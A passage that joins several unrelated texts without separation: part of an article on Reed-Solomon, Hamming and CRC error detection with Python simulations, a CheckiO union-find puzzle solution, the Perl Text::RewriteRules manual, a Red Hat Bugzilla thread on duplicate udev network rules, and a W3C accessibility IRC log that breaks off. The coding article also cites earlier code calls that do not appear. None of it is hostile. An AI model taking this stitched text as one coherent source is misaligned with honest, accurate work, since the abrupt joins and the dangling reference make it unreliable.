The meaning of “low” and “high” channel bit error rates depends on the coding technique used. Hamming codes are short, so you still see benefits from them at channel bit error rates as high as 0.2, whereas RS(255,251) doesn’t help decrease the error rate unless you have channel bit error rates below 0.0005, and the higher-robustness Reed-Solomon codes like RS(255,223) and RS(255,191) work well up to error rates of about 0.01.
The bottom two graphs show us how this reduction in effective bit error rate trades off against the \( E_b/N_0 \) penalty we get for using up part of our channel capacity for the redundancy of parity bits. (Remember, a longer average transmission time per data bit means that we need a larger \( E_b \) per encoded data bit.)
Hamming codes can gain between 0.5-1.5dB of \( E_b/N_0 \) compared to uncoded data, for the same effective data bit error rate.
Reed-Solomon codes can gain between 2-10dB of \( E_b/N_0 \) compared to uncoded data, for the same effective data bit error rate.
This gain works better at low channel bit error rates; the advantages in \( E_b/N_0 \) compared to uncoded data show up if the data bit error rate is somewhere below the 0.0001 to 0.01 range. Reed-Solomon codes beat Hamming codes once you get below about 0.005 data bit error rate, at least for the high-robustness codes; the Reed-Solomon codes which don’t add much redundancy, like RS(255,253), don’t beat Hamming codes unless the data bit error rate is below \( 10^{-7} \).
At high effective bit error rates, the coded messages can have worse performance in terms of \( E_b/N_0 \) for the same effective data bit error rate.
We generally want low effective bit error rates anyway; something in the \( 10^{-6} \) to \( 10^{-12} \) range is probably reasonable, depending on the application and how it is affected by errors. Those applications that have other higher-level layers which can handle retries in case of detected errors, can usually get away with bit error rates of \( 10^{-6} \) or even higher. Storage applications, on the other hand, need to keep errors low, because there’s no possible mechanism for retransmission; the only way to deal with it is to add another layer of error correction — which is something that is used in certain applications.
Why Not Use Reed-Solomon Instead of a CRC?
So here’s a question that might come to mind. Consider the following two pairs of cases:
- RS(255,253) vs. a 253-byte packet followed by a 16-bit CRC
- RS(255,251) vs. a 251-byte packet followed by a 32-bit CRC
Within each pair, there is the same overhead, and about the same encoding complexity and memory requirements if a lookup-table-based encoder is used. Decoders that check for the presence of transmission errors are essentially the same complexity as an encoder; it’s only the error-correction step that takes more CPU horsepower.
A CRC can be used to detect errors, but not to correct them. A Reed-Solomon code can be used to detect and correct errors: up to 1 byte error in the case of RS(255,253), and up to two byte errors in the case of RS(255,251).
So why shouldn’t we be using Reed-Solomon instead of a CRC?
Well, CRCs are meant for detecting a small number of bit errors with guaranteed certainty. Reed-Solomon codes are designed to handle byte errors, and that means bursts of a byte or two, depending on the code parameters. So the nature of the received noise may make a big difference in terms of which is better. Noise models like AWGN, where the likelihood of any individual bit error is independent of any other, favor bit-error detection techniques; noise models in which multi-bit bursts are common will favor Reed-Solomon.
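Here is a small illustrative simulation (not part of the original analysis above) showing how the same number of bit errors can produce very different byte-error counts depending on whether the errors are scattered or bursty:

rng = np.random.RandomState(0)
scattered = rng.choice(255*8, 16, replace=False)   # 16 independent bit errors
burst = np.arange(100, 116)                        # one 16-bit burst
for name, errs in [('scattered', scattered), ('burst', burst)]:
    print("%s: %d byte errors" % (name, len(np.unique(errs // 8))))

The scattered pattern typically lands in 15 or 16 distinct bytes, far too many for a low-redundancy code like RS(255,251) to correct, while the single burst touches only 3 bytes, well within reach of RS(255,247).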
But the biggest impact is that by allowing error correction, we give up some of our ability to detect errors. I mentioned this toward the end of Part XV. Let’s look at it again.
Dry Imp Net Nrp Nmy
Let’s take a look at our fictitious
dry imp net encoding scheme again. Three codewords —
dry,
imp, and
net — and three symbols per word.
This encoding scheme has a Hamming distance of 3, which means we can detect up to 2 errors or correct up to 1 error.
If we don’t do any error correction, there are only 3 codewords out of 27 possible messages, so our ability to detect invalid messages is very good. The only way we’re going to misinterpret
dry as
imp or
net is if we happen to get the right kind of error to switch from one valid codeword to another, which needs three simultaneous errors.
On the other hand, if we do decide to use error correction, then all of a sudden we have 21 acceptable messages. By “acceptable” I mean a message that is either correct or correctable. If we get a message like dmp that was originally dry, sorry, we're going to turn it into imp, because that's the closest codeword. The only unacceptable messages are nrp, nmy, iey, irt, dmt, and dep, which have a minimum distance of 2 to any codeword.
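A brute-force enumeration over all 27 messages confirms these counts:

from itertools import product

codewords = ['dry', 'imp', 'net']
positions = list(zip(*codewords))   # per-position alphabets: d/i/n, r/m/e, y/p/t

def hamming(a, b):
    return sum(x != y for x, y in zip(a, b))

messages = [''.join(m) for m in product(*positions)]
acceptable = [m for m in messages
              if min(hamming(m, c) for c in codewords) <= 1]
print("%d messages, %d acceptable" % (len(messages), len(acceptable)))  # 27, 21
print(sorted(set(messages) - set(acceptable)))
# ['dep', 'dmt', 'iey', 'irt', 'nmy', 'nrp']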
There are a few limited codes — Hamming codes are one of them — which have the property that there are no unacceptable messages. These are called perfect codes, and it means that any received message is either correct or can be corrected to the closest codeword. Here we have to assume that errors are infrequent, and if we do get more errors than we can correct, then we are just going to make an erroneous correction. Oh well.
I looked into this a little bit for Reed-Solomon codes. For \( RS(255,255-2t) \), it looks like \( t=1 \) is close to perfect, and \( t=2 \) isn’t too far away either, but as you start adding more redundancy symbols, the number of uncorrectable messages increases much faster than the number of correctable messages, and these boundaries around each codeword — which are called Hamming spheres, even though they’re more like N-dimensional hypercubes — cover less and less of the message space. Which is good, at least for error detection, because it means we’re more likely to be able to detect errors even if there are more than \( t \) of them.
Below is some data from the Monte Carlo simulations I used to compute bit error rates — this time presented a little differently, showing tables of what happens when there are more than \( t \) errors. Each random error pattern of \( v \) bit errors (and note that this may produce less than \( v \) byte errors, if more than one error occurs in the same byte) can have three outcomes:
CORRECT: the error pattern decodes correctly
FAIL: the decoding step fails, so we don’t change the received message, and the number of received errors stays the same
WORSEN: the error pattern decodes incorrectly, to a different codeword
The table shows the number of samples nsample in each case, and the fraction of those samples that fall into the CORRECT, FAIL, and WORSEN outcomes.
rsanalyzers = [analyzer for analyzer in analyzers
               if isinstance(analyzer, ReedSolomonMonteCarloAnalyzer)]

def summarize_simulation_results(sr):
    shist, fhist = sr
    nfail = sum(fhist)
    nsample = nfail + sum(shist)
    ncorrect = shist[0]
    nworsen = sum(shist[1:])
    return (nsample,
            ncorrect*1.0/nsample,
            nfail*1.0/nsample,
            nworsen*1.0/nsample)

data = [(analyzer.n, analyzer.k, analyzer.t, i+analyzer.t)
        + summarize_simulation_results(sr)
        for analyzer in rsanalyzers
        for i, sr in enumerate(analyzer.simulation_results)
        if i > 0 and i <= 8]
df = pd.DataFrame(data, columns='n k t v nsample ncorrect nfail nworsen'.split())
df.set_index(['n','k','t','v'])
The interesting trends here are
- For RS(255,253), with more than 1 error, the outcome is usually WORSEN. With \( v=2 \) errors we occasionally get a successful correction. Compared to a 16-bit CRC, we risk making errors worse by trying to correct them, so unless we have a system with very low probability of 2 or more errors, we are better off using a 16-bit CRC and not trying to correct errors.
- For RS(255,251), with more than 2 errors, the outcome is about a 50-50 split between FAIL and WORSEN. With \( v=3 \) errors we occasionally get a successful correction. Compared to a 32-bit CRC, we risk making errors worse by trying to correct them. It's not as bad as RS(255,253), but a 50% chance of making things worse if there are three or more errors makes it more attractive to use a 32-bit CRC.
- For RS(255,247), with more than 4 errors, the outcome is usually FAIL, with a small probability of WORSEN. With \( v=5 \) and \( v=6 \) errors we occasionally get a successful correction. Compared to a 64-bit CRC, the use of Reed-Solomon now becomes much more attractive, at least for packets of length 255 or less.
- For RS(255,239) and other decoders with higher \( t \) values, the outcome is almost never WORSEN. The probability of CORRECT grows, even though we are beyond the Hamming bound of at most \( t \) correctable errors. Reed-Solomon is very attractive, but the encoding cost starts to get higher.
These probabilities of a WORSEN outcome are fairly close to their theoretical values, which are just the fraction of all possible messages which are within a Hamming distance of \( t \) of a valid codeword.
For example, if we have RS(255,253), then the last two bytes of valid codewords are completely dependent on the preceding bytes, so the fraction of valid codewords is \( 1/256^2 = 1/65536 \), and the fraction of all possible messages which are within a distance of 1 of those valid codewords is \( \frac{1 + 255 \times 255}{256^2} \approx 0.9922 \). For each codeword we have one message with distance 0 (the codeword itself) and \( 255 \times 255 \) messages with distance 1: each of the 255 message bytes can be corrupted with 255 other values.
Or if we have RS(255,251), this fraction becomes \( \frac{1 + 255 \times 255 + \frac{255 \times 254}{2} \times 255^2}{256^4} \approx 0.4903 \).
The general formula for this fraction is
$$\rho(t) = 256^{-2t}\sum\limits_{j=0}^t {255\choose j}255^j$$
which we can graph:
def rscoverage(t):
    y = 0
    p = 1.0/256
    x = 1.0
    for k in xrange(t+1):
        u = x
        for j in xrange(2*t-k):
            if j < k:
                u *= 255.0/256
            else:
                u *= p
        y += u
        x *= (255-k)/256.0
        x /= k+1
    return y

tlist = np.arange(1,21)
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
ax.semilogy(tlist, [rscoverage(t) for t in tlist], '.')
ax.set_title('Fraction of messages in $RS(255,255-2t)$\n within distance $t$ of a valid codeword')
ax.set_xlabel('$t$', fontsize=12)
ax.set_ylabel('$\\rho$', fontsize=12)
ax.grid('on')
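As a quick cross-check, the closed-form expression for \( \rho(t) \) can also be evaluated directly with exact integer arithmetic; it agrees with rscoverage above for the two cases computed by hand:

def rho(t):
    from math import factorial
    def C(n, k):
        return factorial(n) // (factorial(k) * factorial(n - k))
    return sum(C(255, j) * 255**j for j in range(t + 1)) / 256.0**(2*t)

print(rho(1))   # ~0.9922, the RS(255,253) fraction
print(rho(2))   # ~0.4903, the RS(255,251) fraction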
The sweet spot for low-end embedded systems is probably to use Reed-Solomon (255,247), where \( t=4 \). Possibly (255,239), where \( t=8 \). Smaller values of \( t \) allow a table-based implementation with a minimum amount of CPU time and memory; larger values of \( t \) lower the probability of erroneous correction.
But the most important thing is really to understand the behavior of errors in your system:
Probability of errors – run some tests and try to figure out the rate of errors without any attempt at error correction. A system with an average error rate of 1 error per \( 10^{6} \) bytes is a much different system to work with than one that has an average error rate of 1 error per 1000 bytes.
Impact of errors – if you’re working with audio data, an error might sound like a brief “pop” in the sound, and this may not be a big deal. If you have a sensor gathering and transmitting data from a once-in-a-lifetime experiment, and losing data can make or break the results, then error correction coding is relatively cheap insurance.
Real-world Applications of Reed-Solomon Codes
Reed-Solomon codes are now in widespread use.
We already talked about the use of Reed-Solomon codes in the Voyager space probes from the Uranus and Neptune encounters onwards. They have been supplanted in more recent NASA missions, such as the Mars Reconnaissance Orbiter, by turbo codes, which have higher \( E_b/N_0 \) gain.
Compact discs and DVDs use cross-interleaved Reed-Solomon encoding to increase the robustness against errors even if they show up as scratches impacting large numbers of bits.
Broadband data transmission systems like VDSL2 use Reed-Solomon codes to reduce error rates for a given transmitter energy.
The application I find most interesting is in QR codes, where Reed-Solomon codes are used along with a clever scheme to distribute the data bits spatially over a wide area. This makes them robust to severe data loss errors.
Normally you see clean, undamaged QR code images, but they can still be decoded even when part of the information has been corrupted. (The original article shows a clean QR code here, followed by three versions with progressively larger portions blotted out.)
I couldn’t find a QR code application that outputs the raw binary bits before decoding, but it would be interesting to see how many errors or erasures these images have. The four levels of error correction in a QR code, L, M, Q, and H, allow up to 30% errors by requiring more bits to encode a given message. The code above is an H-level code, and I kept adding larger and larger disturbances until the decoder was unable to process an image; these are slightly below the failure point, so they are probably in the 25-30% range.
Wrapup
OK! We’ve wandered around the topic of Reed-Solomon codes today, covering a few important points:
- Reed-Solomon codes represent messages as polynomials with coefficients in \( GF(2^m) \), and are often denoted as \( RS(n,k) \)
- The Reed-Solomon \( (255,255-2t) \) code is a common subset, representing a codeword as 255 bytes, each byte an element of \( GF(2^8) \). This allows for correction of up to \( t \) errors or \( 2t \) erasures.
- To specify a particular Reed-Solomon code, in addition to knowing \( n \) and \( k \), you need the characteristic polynomial of the symbol field — for \( GF(2^8) \), this is a degree 8 polynomial — and the generator polynomial, which is of the form \( g(x) = (x+\lambda^b)(x+\lambda^{b+1})(x+\lambda^{b+2})\ldots (x+\lambda^{b+2t-1}) \), where \( b \) is an integer and \( \lambda \) is any generating element in \( GF(2^8) \) — meaning that all nonzero elements of \( GF(2^8) \) are expressible as \( \lambda^i \) for some integer \( i \) between 0 and 254. The important property of \( g(x) \) is that its roots are \( 2t \) consecutive powers of \( \lambda \). (A small sketch of this construction appears after this list.)
- Algebraically, encoding a message involves expressing it as a polynomial \( M(x) \), computing \( r(x) = x^{2t}M(x) \bmod g(x) \) and constructing the codeword \( C_t(x) = x^{2t}M(x) + r(x) \)
- In practical terms, we can encode a message using an LFSR where the shift cells contain elements of \( GF(2^8) \) and the LFSR taps are multiplier coefficients in \( GF(2^8) \), each tap corresponding to the corresponding coefficient in the generator polynomial.
- This LFSR approach can be implemented using lookup tables to handle the finite field mathematics
- Decoding takes considerably more processing power, and we didn’t cover the details in this article.
- Shortened Reed-Solomon codes are formed by taking an \( (n,k) \) code and using it as an \( (n-l,k-l) \) code, where both transmitter and receiver assume that there are \( l \) implicit zeros at the beginning of the message.
- Calculating bit error rates is a pain. But if you do it right, you will end up with curves of data bit error rate vs. \( E_b/N_0 \), like the graphs shown earlier in this article.
- Higher values of \( t \) reduce the code rate somewhat, but allow for greater gains in \( E_b/N_0 \) for the same data bit error rate. (Or alternatively, much lower data bit error rates for the same amount of signal energy per bit per unit noise.)
- Use of error correction reduces our ability to detect errors, especially at low values of \( t \); but for \( t > 4 \) or so, the probability of mistakenly correcting more than \( t \) errors to the wrong codeword is very small. The vast majority of the time, if there are more than \( t \) errors, the decoder just fails and the number of errors remains unchanged. There are cases with more than \( t \) errors where the decoder would produce a correction to the wrong codeword, but this has a low probability unless the errors are introduced intentionally.
- Reed-Solomon has lots of applications for reducing the probability of errors: space transmission, storage formats like CDs and DVDs, QR codes, and DSL.
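To make the generator-polynomial point above concrete, here is a small sketch (not from the original article) that expands \( g(x) \) in \( GF(2^8) \), assuming the same field parameters used by the rs.RSCoder calls earlier (prim=0x11d, \( \lambda = 2 \), \( b = 0 \)):

def gf_mul(a, b, prim=0x11d):
    # carryless multiplication in GF(2^8), reduced by the field polynomial
    r = 0
    while b:
        if b & 1:
            r ^= a
        a <<= 1
        if a & 0x100:
            a ^= prim
        b >>= 1
    return r

def rs_generator_poly(nsym):
    # expand g(x) = (x + lam^0)(x + lam^1)...(x + lam^(nsym-1)), with lam = 2
    g = [1]
    lam_pow = 1
    for _ in range(nsym):
        new = [0] * (len(g) + 1)
        for i, c in enumerate(g):
            new[i] ^= c                      # coefficient times x
            new[i+1] ^= gf_mul(c, lam_pow)   # coefficient times the current root
        g = new
        lam_pow = gf_mul(lam_pow, 2)
    return g

print(rs_generator_poly(2))   # [1, 3, 2], i.e. x^2 + 3x + 2: the 2t=2 case of RS(255,253)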
That’s all for today!
Next time we will tackle an interesting problem relating to CRCs.
References
Error-Correcting Codes:
- Gregory Mitchell, ARL-TR-4901: Investigation of Hamming, Reed-Solomon, and Turbo Forward Error Correcting Codes, US Army Research Laboratory, July 2009.
Reed-Solomon / BCH codes:
C.K.P. Clarke, WHP031: Reed-Solomon Error Correction, British Broadcasting Corporation, January 2002.
William Geisel, NASA Technical Memorandum 102162: Tutorial on Reed-Solomon Error Correction Coding, National Aeronautics and Space Administration, August 1990.
John Gill, EE 387 Notes 7: BCH and Reed-Solomon Codes, Stanford University, 2014.
Fabrizio Pollara, A Software Simulation Study of a (255,223) Reed-Solomon Encoder-decoder, Jet Propulsion Laboratory, JPL Publication 85-23, April 1985. (This report is interesting because it contains C code for both an encoder and decoder. I have not tried to use either, and it’s nearly unreadable code, using short cryptic identifiers everywhere.)
Duke University, CPS296 lecture notes on decoding.
Wikiversity, Reed-Solomon Codes for Coders
I. S. Reed and G. Solomon, Polynomial Codes over Certain Finite Fields, Journal of the Society for Industrial and Applied Mathematics, Volume 8, issue 2, pp. 300–304, June 1960.
Yasuo Sugiyama, Masao Kasahara, Shigeichi Hirasawa, and Toshihiko Namekawa, A Method for Solving Key Equation for Decoding Goppa Codes, Information and Control Volume 27, issue 1, January 1975, pp 87-99.
AWGN Channels:
- Dilip Sarwate, ECE 361: Lecture 3: Matched Filters – Part I, 2011. This has the equation for determining the variance of received white noise after it goes through a filter \( h(t) \).
QR Codes:
- Bill Casselman, How to Read QR Symbols Without Your Mobile Telephone, American Mathematical Society, 2013.
First solution in Clear category for City's Happiness by arbores401
def find(grp, a):
    if grp[a] == a:
        return a
    grp[a] = find(grp, grp[a])   # path compression
    return grp[a]


def union(grp, a, b):
    x, y = sorted([find(grp, a), find(grp, b)], key=grp.__getitem__)
    if x != y:
        grp[y] = x


def score_when_city_removed(net, users, remove_city):
    vs = [v for v in users.keys() if v != remove_city]
    es = [e for e in net if remove_city not in e]
    grp = {v: v for v in vs}
    for e in es:
        union(grp, *e)
    for v in vs:
        find(grp, v)   # full path compression, so grp[v] is always a root
    grp_score = [sum(users[v] for v in vs if grp[v] == g)
                 for g in set(grp.values())]
    return sum(x * x for x in grp_score) + users[remove_city]


def most_crucial(net, users):
    cities = list(users)
    scores = [score_when_city_removed(net, users, c) for c in cities]
    return [c for i, c in enumerate(cities) if scores[i] == min(scores)]
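A quick sanity check; the mission's exact input format is not shown on this page, so the network and user counts below are made up for illustration:

net = [['A', 'B'], ['B', 'C'], ['D', 'E']]
users = {'A': 10, 'B': 20, 'C': 30, 'D': 40, 'E': 50}
print(most_crucial(net, users))   # -> ['E'] for these made-up inputs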
June 26, 2018
Text::RewriteRules - A system to rewrite text using regexp-based rules
 use Text::RewriteRules;

 RULES email
 \.==> DOT
 @==> AT
 ENDRULES

 print email("ambs@cpan.org")   # prints ambs AT cpan DOT org

 RULES/m inc
 (\d+)=e=> $1+1
 ENDRULES

 print inc("I saw 11 cats and 23 dogs")   # prints I saw 12 cats and 24 dogs
This module uses a simplified syntax for regexp-based rules for rewriting text. You define a set of rules, and the system applies them until no more rule can be applied.
Two variants are provided. The classical rewrite works like this:

 while it is possible to substitute
     apply the first substitution rule that matches

The cursor-based rewrite works like this:

 add a cursor to the beginning of the string
 while the cursor has not reached the end of the string
     apply a substitution just after the cursor and advance the cursor
     or, if no rule can be applied, just advance the cursor
A lot of computer science problems can be solved using rewriting rules.
Rewriting rules consist of mainly two parts: a regexp (LHS: Left Hand Side) that is matched with the text, and the string to use to substitute the content matched with the regexp (RHS: Right Hand Side).
Now, why not use a simple substitution? Because we want to define a set of rules and match them again and again, until no LHS regexp matches.

A point of discussion is the syntax used to define this system. A brief discussion showed that some users would prefer a function that receives a hash with the rules; some others prefer syntactic sugar.
The approach used is the latter: we use Filter::Simple so that we can add a specific non-Perl syntax inside the Perl script. This improves the legibility of big rewriting-rule systems.
This documentation is divided in two parts: first we will see the reference of the module. Kind of, what it does, with a brief explanation. Follows a tutorial which will be growing through time and releases.
Note: most of the examples are very stupid, but that is the easiest way to explain the basic syntax.
The basic syntax for the rewrite rules is a block, started by the keyword RULES and ended by ENDRULES. Everything between them is handled by the module and interpreted as rules or comments.
The RULES keyword can handle a set of flags (we will see that later), and requires a name for the rule-set. This name will be used to define a function for that rewriting system.

 RULES functionname
 ...
 ENDRULES
The function is defined in the main namespace where the RULES block appears.
In this block, each line can be a comment (Perl style), an empty line or a rule.
A basic rule is a simple substitution:
 RULES foobar
 foo==>bar
 ENDRULES
The arrow ==> is used as the delimiter. At its left is the regexp to match; at its right, the substitution. So, the previous block defines a foobar function that substitutes all foo by bar.
Although this can seems similar to a global substitution, it is not. With a global substitution you can't do an endless loop. With this module it is very simple. I know you will get the idea.
You can use the syntax of Perl both on the left and right hand side of the rule, including $1....
If the Perl substitution supports execution, why not support it as well? So, you get the idea. Here is an example:

 RULES foo
 (\d+)b=e=>'b' x $1
 (\d+)a=eval=>'a' x ($1*2)
 ENDRULES
So, for any number followed by a b, we replace it by that number of b's. For each number followed by an a, we replace them by twice that number of a's.

Evaluation is requested with an e or eval inside the arrow. I should remind you that you can mix all these rule types together in the same rewriting system.
In some cases we want to perform a substitution only when the pattern matches and a set of conditions about that pattern holds.

For that, we use a three-part rule: the common rule plus the condition part, separated from the rule by !!. These conditional rules can be applied both to basic and execution rules.

 RULES translate
 ([[:alpha:]]+)=e=>$dic{$1} !! exists($dic{$1})
 ENDRULES
The previous example would translate all words that exist in the dictionary.
Sometimes it is useful to change something in the string before starting to apply the rules. For that, there is a special rule named begin (or b for short) with just a RHS. This RHS is Perl code, any Perl code. If you want to modify the string, use $_.

 RULES foo
 =b=> $_ .= " END"
 ENDRULES
As you use last in Perl to skip the remaining code in a loop, you can also call a last (or l) rule when a specific pattern matches.
Like the begin rule with only a RHS, the last rule has only a LHS:

 RULES foo
 foobar=l=>
 ENDRULES
This way, the rules iterate until the string matches foobar.
You can also supply a condition in a last rule:
 RULES bar
 f(o+)b(a+)r=l=> !! length($1) == 2 * length($2)
 ENDRULES
It is possible to use the regular expressions /x mode in the rewrite rules. In this case:
 RULES/x f1
 (\d+) (\d{3}) (000) ==>$1 milhao e $2 mil!! $1 == 1
 ENDRULES
To facilitate matching complex languages Text::RewriteRules defines a set of regular expressions that you can use (without defining them).
There are three kinds of usual parenthesis: standard parentheses, brackets, and curly braces. You can match a balanced string of parenthesis using the power expressions [[:PB:]], [[:BB:]], and [[:CBB:]] for these three kinds of parenthesis.
For instance, if you apply this rule:
[[:BB:]]==>foo
to this string
something [ a [ b] c [d ]] and something more
then, you will get
something foo and something more
Note that if you apply it to
something [[ not ] balanced [ here
then you will get
something [foo balanced [ here
The power expression [[:XML:]] matches an XML tag (with or without children XML tags). Note that this expression matches only well-formed XML tags.

As an example, the rule

 [[:XML:]]==>tag
applied to the string
<a><b></a></b> and <more><img src="foo"/></more>
will result in
<a><b></a></b> and tag
At the moment, just a set of commented examples.
Example1 -- from number to portuguese words (using traditional rewriting)
Example2 -- Naif translator (using cursor-based rewriting)
Yes, you can use Lingua::PT::Nums2Words and similar (for other languages). Meanwhile, before it existed we needed to write such a conversion tool.
Here I present a subset of the rules (for numbers below 1000). The generated text is Portuguese but I think you can get the idea. I'll try to create a version for English very soon.
You can check the full code in the samples directory (file num2words).
 use Text::RewriteRules;

 RULES num2words
 100==>cem
 1(\d\d)==>cento e $1
 0(\d\d)==>$1
 200==>duzentos
 300==>trezentos
 400==>quatrocentos
 500==>quinhentos
 600==>seiscentos
 700==>setecentos
 800==>oitocentos
 900==>novecentos
 (\d)(\d\d)==>${1}00 e $2
 0(\d)==>$1
 (\d)(\d)==>${1}0 e $2
 1==>um
 2==>dois
 3==>três
 4==>quatro
 5==>cinco
 6==>seis
 7==>sete
 8==>oito
 9==>nove
 0$==>zero
 0==>
  ==> 
 ,==>,
 ENDRULES

 num2words(123);   # returns "cento e vinte e três"
 use Text::RewriteRules;

 %dict = (driver => "motorista", the => "o", of => "de", car => "carro");
 $word = '\b\w+\b';

 if ( b(a("I see the Driver of the car")) eq "(I) (see) o Motorista do carro" )
      {print "ok\n"}
 else {print "ko\n"}

 RULES/m a
 ($word)==>$dict{$1}                 !! defined($dict{$1})
 ($word)=e=> ucfirst($dict{lc($1)})  !! defined($dict{lc($1)})
 ($word)==>($1)
 ENDRULES

 RULES/m b
 \bde o\b==>do
 ENDRULES
Alberto Simões, <ambs@cpan.org>

José João Almeida, <jjoao@cpan.org>
We know documentation is missing and you all want to use this module. In fact we are using it a lot, what explains why we don't have the time to write documentation.
Please report any bugs or feature requests to bug-text-rewrite@rt.cpan.org, or through the RT web interface. I will be notified, and then you'll automatically be notified of progress on your bug as I make changes.
Damian Conway for Filter::Simple
Copyright 2004-2012 Alberto Simões and José João Almeida, All Rights Reserved.
This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself.
Red Hat Bugzilla – Full Text Bug Listing
Description of problem:
If you manually change the network name to MAC address matching it creates new entries in '/etc/udev/rules.d/70-persistent-net.rules' instead of removing the old entries. For example, I've got three interfaces and the installer chose two given NICs as 'eth0' and 'eth2'. I went in to the advanced network configuration and swapped the MAC addresses and it created two new lines in the above file, causing 'eth0' to not come up on first boot. Deleted the duplicate lines solved the problem.
Version-Release number of selected component (if applicable):
anaconda-13.21.82-1.el6.x86_64
How reproducible:
First try, will try on other hardware and report if not 100%
Steps to Reproduce:
1. Select advanced configuration during installation and swap the MAC address between two 'ethX' devices.
2. Complete install and reboot.
3.
Actual results:
Duplicate entries.
Expected results:
Single entries with revised MAC addresses.
Additional info:.
Just name your interfaces with another namespace like "net*" and all those problems go away.
This issue is probably related to:
(In reply to comment #2)
>.
It's been some time since I filed this bug, I will have to test to see if it persists.
(In reply to comment #3)
> Just name your interfaces with another namespace like "net*" and all those
> problems go away.
> This issue is probably related to:
>
I'm not sure if it's related, I am not familiar with the source so I can't comment on the patch.
As for changing the name: that is another workaround, not a fix for the actual problem.
please retest with RHEL 6.3 udev
ping?
Blast from the past... sorry, I'll try to test today on 6.7.
Any news?
Sorry for the delay...
It still created the duplicate udev rules. Fresh RHEL 6.7 install in a KVM VM with two interfaces. As before, I went to advanced network settings and swapped the MAC addresses.
I tried this now with two interfaces, eth0 and eth1. I left the MAC addresses as they were and set a cloned MAC address on each, equal to the MAC address of the other interface. This should be the proper way to actually swap MAC addresses; if you change the MAC addresses themselves, you are basically swapping interface names.

I went ahead, knowing this is probably all wrong, finished the installation and rebooted. I ended up with a system that had the same MAC address configured on both interfaces (that was sort of expected), 2 entries in the 70-persistent rules, and invalid ifcfg files (they contained both the HWADDR and MACADDR options, a combination the initscripts docs describe as an unsupported/broken setup).

Bottom line, I think that what you are trying to do just can't work.
I've found similar bug reports for ubuntu/debian[1][2]. However I was not able to reproduce the issue as described by [1]. I can however backport the fix which ubuntu/debian now have and provide you with the test package.
[1]
[2]
Here are test packages,
Just to elaborate on comment #14.
Test packages them self are not that useful because issue occurs during system installation. Thus, I've created anaconda updates.img, problem is that I wasn't able to successfully use it (probably due to some anaconda limitation with regards to update images in RHEL6).
The only way I can think of how you can test the new package (in VM) is to unpack rpm to some place which is accessible from installer environment, start installation, using shell provided by installer replace udev and other files shipped in udev rpm which are part of installer environment, kill running udev daemon, start it again (now process will start from new binary), and finally hot-plug second NIC, then proceed with installation as described in bug Description.
This update broke renaming of the devices on our machines.
We have:
# cat /etc/sysconfig/network-scripts/ifcfg-lblnet
DEVICE=lblnet
BOOTPROTO=static
IPADDR=10.0.0.2
NETMASK=255.255.255.0
IPV6INIT=yes
IPV6ADDR=fd00:0::2/64
IPV6_AUTOCONF=no
NM_CONTROLLED=yes
ONBOOT=yes
TYPE=Ethernet
HWADDR=c4:34:6b:ac:98:8d
If I downgrade udev, everything works.
Swapping MAC addresses didn't cause any duplicates in /etc/udev/rules.d/70-persistent-net.rules. A manual swap just renames the devices and creates new records in /etc/udev/rules.d/70-persistent-net.rules.

If the "clone" field in the advanced settings is used for the swap, the result may cause problems, because this way of swapping MAC addresses is not recommended (supported).

Since I was not able to reproduce the duplicate-records scenario: verified.
IRC log of wai-wcag on 2004-08-25
Timestamps are in UTC.
13:59:28 [RRSAgent]
RRSAgent has joined #wai-wcag
14:00:02 [ChrisR]
ChrisR has joined #wai-wcag
14:00:16 [Zakim]
WAI_WCAG(techniques)10:00AM has now started
14:00:23 [Zakim]
+Michael_Cooper
14:00:25 [Michael]
zakim, I am Michael_Cooper
14:00:25 [Zakim]
ok, Michael, I now associate you with Michael_Cooper
14:00:49 [nabe]
nabe has joined #wai-wcag
14:00:57 [Zakim]
+Chris_Ridpath
14:01:21 [Zakim]
+??P8
14:01:26 [Zakim]
+Alex_Li
14:01:39 [Michael]
zakim, ??P8 is David_MacDonald
14:01:39 [Zakim]
+David_MacDonald; got it
14:01:55 [Becky]
Becky has joined #wai-wcag
14:02:35 [Zakim]
+??P12
14:02:55 [Michael]
zakim, ??P12 is Takayuki_Watanabe
14:02:58 [Zakim]
+Takayuki_Watanabe; got it
14:03:02 [Zakim]
+Becky_Gibson
14:03:26 [Zakim]
+John_Slatin
14:03:47 [nabe]
zakim, I am Takayuki_Watanabe
14:03:47 [Zakim]
ok, nabe, I now associate you with Takayuki_Watanabe
14:03:57 [Zakim]
+Wendy
14:04:29 [wendy]
wendy has joined #wai-wcag
14:05:10 [wendy]
zakim, who's on the phone?
14:05:10 [Zakim]
On the phone I see Michael_Cooper, Chris_Ridpath, David_MacDonald, Alex_Li, Takayuki_Watanabe, Becky_Gibson, John_Slatin, Wendy
14:05:53 [Zakim]
+[Microsoft]
14:06:37 [Michael]
zakim, [Microsoft] is temporarily Jenae_Andershonis
14:06:37 [Zakim]
+Jenae_Andershonis; got it
14:08:11 [wendy]
Topic: Techniques proposals
14:08:42 [wendy]
Gateway, John: has not gone to list as proposal. still working on.
14:08:59 [wendy]
goal: to have draft to list as proposal by end of friday.
14:09:16 [wendy]
have not received feedback on 1.1 from 30 july draft.
14:10:23 [wendy]
mc: want to discuss anything?
14:11:14 [wendy]
js: purpose of gateway is to set up use of other technologies, would like people to take a look where mention other technologies (e.g., svg, mathml)
14:11:24 [Zakim]
+??P26
14:11:46 [Michael]
zakim, ??P26 is Lisa_Seeman
14:11:46 [Zakim]
+Lisa_Seeman; got it
14:12:00 [wendy]
js: secondly, in general, is it making sense and fulfilling the purpose/role you had anticipated/expected for gateway
14:12:32 [wendy]
js: there is material in the 30 july draft that needs reviewing. there is also a proposal that will be coming on friday.
14:20:40 [wendy]
CSS, Wendy: need results of testing from user agents (e.g. support for xx-small to xx-large) before know how to move forward. will approach uawg about testing. found a test file. wonder about how it *should* work in a screen reader.
14:22:15 [wendy]
wac sent requests for review/contributions to variety of css developers
14:24:07 [wendy]
bg looked up image replacement thread. tom gilmore found a way to use images of text and have equivalents that screen readers will pick up.
14:25:56 [wendy]
action: bg send proposal to list re: image replacement technique
14:26:23 [wendy]
HTML, Michael: went through techniques that chris submitted and created proposals around them.
14:26:32 [wendy]
mc with 6, decided they were gateway techniques not html.
14:28:36 [wendy]
mc after incorporated into gateway, may come back to html techniques (after we have the structure)
14:29:11 [wendy]
js issue with granularity of gateway techniques in relation to the tech-specific.
14:29:48 [wendy]
js tend to think in terms of present the issues/general considerations in connection w/a particular guideline then break those into categories and then funnel out to tech-specifics.
14:30:30 [wendy]
